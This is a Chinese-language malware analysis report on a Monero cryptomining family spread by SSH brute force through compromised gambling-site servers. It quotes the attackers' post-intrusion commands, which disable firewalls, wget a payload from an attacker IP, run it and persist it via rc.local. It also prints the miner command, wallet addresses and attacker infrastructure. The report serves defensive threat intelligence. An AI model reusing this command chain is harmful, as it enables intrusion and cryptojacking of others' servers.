一、前言
騰訊安全云鼎實驗室通過部署的威脅感知系統捕獲了一批挖礦樣本（具有同源性），是一批可挖取門羅幣(xmr)的挖礦病毒。這批樣本今年5月開始出現，目前各大殺軟對此樣本基本無法有效查殺，騰訊云云鏡第一時間跟進查殺。根據進一步溯源的信息可以推測該挖礦團伙利用被入侵的博彩網站服務器進行病毒傳播。
分析顯示，此挖礦樣本不具有傳播性，總體結構式是 Loader + 挖礦子體，挖礦團伙通過控制的機器進行遠程 SSH 暴力破解并將病毒進行傳播。由于目前能對付此病毒的殺軟極少，且該病毒通過入侵的賭博網站服務器進行病毒傳播、挖礦，讓真相撲朔迷離，云鼎實驗室威脅情報小組將本次門羅幣挖礦新家族命名為「羅生門」。
二、入侵分析
挖礦樣本通過母體釋放挖礦子體，母體是 Loader ，釋放挖礦子體，執行挖礦子體。母體本身不包含 SSH 爆破等蠕蟲動作，子體就是單純的挖礦代碼（加殼變形 UPX）。通過觀測發現，進行 SSH 爆破的主機 IP 較少且固定，可以認定為固定機器，使用工具進行掃描、爆破。通過這種廣撒網的方式，犯罪團伙能收獲不少門羅幣。
攻擊流程圖：

攻擊過程示意：

攻擊日志來源：http://bikewiki.jp:5000/app/2018/07/27/073148-4879.log
母體 Loader 詳細分析：
母體 Loader 的行為包含自啟動和釋放運行文件兩個部分。

自啟動代碼：
在函數 main_Boot 中通過 sed 編輯 rc.local 和 boot.local 來進行自啟動。
釋放文件：

執行文件：

三、病毒子體分析
通過對挖礦樣本進行分析發現，子體是一個加殼后的標準礦機程序，子體加殼也是導致殺軟無法查殺的一個方式。子體加殼為 UPX 變形殼，可以抵抗通用脫殼機的脫殼。手動脫殼后發現為標準挖礦程序（開源礦機程序）。
相關開源項目連接為：https://github.com/sumoprojects/cryptonote-sumokoin-pool

四、礦池分析與統計
據觀測今年5月至9月初，蜜罐捕獲的「羅生門」挖礦病毒累計挖出約12.16個門羅幣，價值約1w人民幣（2018年10月8日，門羅幣價格為114.2USD，合計1388.67美金），算力為8557H/S,大約是皮皮蝦礦池的百分之一算力。從算力上看，這種廣撒網式的傳播，也能有一定的規模。
挖礦樣本執行挖礦的命令如下：
-B -ostratum+tcp://mine.ppxxmr.com:7777-u 41tPS2hg6nc6DWNXDiWG7ngGSnLAaw4zmBeM478r1tkZDGH1y8aFPDiDqAFN8LouyAXTxtrLVigmRgLXytezCM'Qf1FwzqEi-px -k --max-cpu-usage=75
從挖礦命令中可知，挖礦樣本對 CPU 利用率有一定的限制，最大 CPU 使用量為75%。
挖礦樣本針對的礦池地址和門羅幣(xmr)產量如下：

對應的錢包地址為：
錢包地址：
45KGejq1HDHXB618E3aeWHFyoLh1kM5syRG8FHDiQ4pZXZF1pieqW7DM5HHe3Y2oc1YwoEc7ofjgtbeEqV3UrkS9SVygJPT 
45KGejq1HDHXB618E3aeWHFyoLh1kM5syRG8FHDiQ4pZXZF1pieqW7DM5HHe3Y2oc1YwoEc7ofjgtbeEqV3UrkS9SVygJPT
45vKgdPY4M3Lp4RXWccWCBFP7HCtcp718GyGaNVmi58j9rdDX716yz5MKXT2EDjFixgPW8mjnaXvz2cBUpEqVCLKFH1z9Tx
45vKgdPY4M3Lp4RXWccWCBFP7HCtcp718GyGaNVmi58j9rdDX716yz5MKXT2EDjFixgPW8mjnaXvz2cBUpEqVCLKFH1z9Tx
41tPS2hg6nc6DWNXDiWG7ngGSnLAaw4zmBeM478r1tkZDGH1y8aFPDiDqAFN8LouyAXTxtrLVigmRgLXytezCMQf1FwzqEi
45KGejq1HDHXB618E3aeWHFyoLh1kM5syRG8FHDiQ4pZXZF1pieqW7DM5HHe3Y2oc1YwoEc7ofjgtbeEqV3UrkS9SVygJPT
45KGejq1HDHXB618E3aeWHFyoLh1kM5syRG8FHDiQ4pZXZF1pieqW7DM5HHe3Y2oc1YwoEc7ofjgtbeEqV3UrkS9SVygJPT
47xB4pdBngkhgTD1MdF9sidCa6QRXb4gv6qcGkV1TT4XD6LfZPo12CxeX8LCrqpVZm2eN3uAZ1zMQCcPnhWbLoPgNbK8y3Z
41tPS2hg6nc6DWNXDiWG7ngGSnLAaw4zmBeM478r1tkZDGH1y8aFPDiDqAFN8LouyAXTxtrLVigmRgLXytezCMQf1FwzqEi
五、免殺分析
1、檢測效果：
將挖礦樣本在 VirusTotal 中檢測發現，除了 Drweb 可以檢出此樣本，其余殺軟均無法有效檢測此樣本。挖礦病毒5月出現，流行3月有余，VirusTotal 上依然只有1款殺軟可以查殺。
下圖是挖礦樣本在 VirusTotal 中的檢測結果：

2、免殺流程：
基本所有殺軟都無法查殺此病毒，此病毒通過 Go 語言 Loader 和子體加變形 UPX 殼進行免殺，對于 Linux 查殺較為薄弱的殺軟，很容易漏報。
免殺示意圖：

Loader 使用 Go 語言編寫，大量的 Go 語言的庫代碼掩蓋了真正的病毒代碼部分，所以免殺效果較好。2155個 Go 語言庫函數，真正的病毒代碼包含在4個函數中。

六、溯源分析
對這批挖礦樣本進行溯源分析發現，從今年5月開始，發起攻擊的 IP一共有兩個：160.124.67.66、123.249.34.103
另外，樣本下載地址：181.215.242.240、123.249.9.141、 123.249.34.103、58.221.72.157、160.124.48.150
SSH 暴力破解成功后執行的命令有（suSEfirewall的關閉、iptables 的關閉、樣本的下載）：
/etc/init.d/iptables stop; 
service iptables stop; 
SuSEfirewall2 stop; 
reSuSEfirewall2 stop;cd/tmp;
wget -chttp://181.215.242.240/armtyu;
chmod 777 armtyu;./armtyu;
echo “cd/tmp/”>>/etc/rc.local;
echo”./armtyu&”>>/etc/rc.local;echo “/etc/init.d/iptablesstop
IP 地址 
服務器地址 
對外開放服務 
其他描述 
181.215.242.240 
美國 
netbios 
ftp、垃圾郵件、僵尸網絡 
160.124.67.66 
中國 香港 
netbios 
mmhongcan168.com、28zuche.com、014o.com、ip28.net、掃描 
160.124.48.150 
中國 香港 
netbios 
ip28.net、掃描 
123.249.9.141 
中國 貴州 
僵尸網絡 
（掃描 IP 和下載 IP  信息表）
表格中 160.124.67.66 是掃描 IP，通過對 IP 信息的圖譜聚類，發現香港的兩臺主機均為一個團伙控制的機器。美國和貴州的機器是入侵得到的機器。

（團伙圖聚類）
上面提到的掃描機器均為賭博網站的機器，曾經的域名mmhongcan168、28zuche 等都是賭博網站。
28zuche：


另一臺香港機器的域名為 himitate.com，也是賭博網站。

兩臺香港主機均為 ip28.net，都可以作為門羅幣(xmr)的挖礦代理主機。 
黑產江湖之黑吃黑：
有人的地方就有江湖，黑產作為互聯網中的法外之地，弱肉強食也是這個不法之地的規則。有做大產業的黑產大佬，也有干一票就走的小團伙，黑吃黑幾乎天天都在上演。
賭博網站和色情網站是黑吃黑中常常被吃的對象，經研究分析可知，眾多賭博網站所在的服務器竟被用來做掃描，各賭博網站之間并沒發現強關聯性，做賭博的團伙同時做挖礦的跨界運營也不是很多，而且整個挖礦金額不高。挖礦團伙若是入侵了賭博網站，利用其作為病毒服務器傳播挖礦病毒，這也不是不可能。
對于美國和貴州的兩臺下載機，根據 threatbook 的情報，這兩臺主機應該是肉雞，如下圖：

第二個掃描地址為：123.249.34.103 
58.221.72.157 
江蘇 
rat 
123.249.34.103 
貴州 
scan 
mdb7.cn 
美國 
bot 
地理位置：
掃描地址 123.249.34.103的實際地址為中國貴州黔西南布依族苗族自治州，相關的情報如下：

相關網站解析過的地址為：
f6ae.com
www.f6ae.com
www.h88049.com
www.h88034.com
h88032.com
www.h88032.com
h88034.com
h88049.com
h5770.com
h88051.com
以上 URL 地址均為賭博網站：

其他的一些情報：
云鼎實驗室威脅情報團隊在網絡上也觀測到這些 IP 的掃描行為，很多日志都有記錄。可以發現這個挖礦樣本的掃描傳播是一種無針對的、廣撒網式的暴力破解傳播模式。